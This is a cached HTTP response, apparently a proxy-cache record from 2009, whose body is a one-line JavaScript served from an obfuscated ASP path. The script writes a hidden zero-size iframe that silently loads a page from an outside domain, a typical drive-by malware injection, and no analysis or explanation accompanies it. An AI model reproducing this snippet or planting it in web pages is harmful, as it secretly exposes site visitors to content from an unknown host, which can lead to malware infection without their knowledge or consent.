HTTP/1.1 200 OK
Content-Length: 107
Date: Tue, 03 Mar 2009 02:21:48 GMT
Expires: Tue, 03 Mar 2009 02:21:48 GMT
Cache-Control: must-revalidate
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
SumT: OK
Pragma: no-cache
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSTDDTDB=OAMDLJECPDGDPPCLGHHAIJEI; path=/
X-Polipo-Location: http://js.k0102.com/%30%31%2E%61%73%70
X-Polipo-Date: Tue, 03 Mar 2009 02:33:12 GMT
X-Polipo-Access: Tue, 03 Mar 2009 02:33:12 GMT


document.writeln("<iframe src=http://qbscs.cnmjm.net/zz.html style='width: 0px; height: 0px;'></iframe>")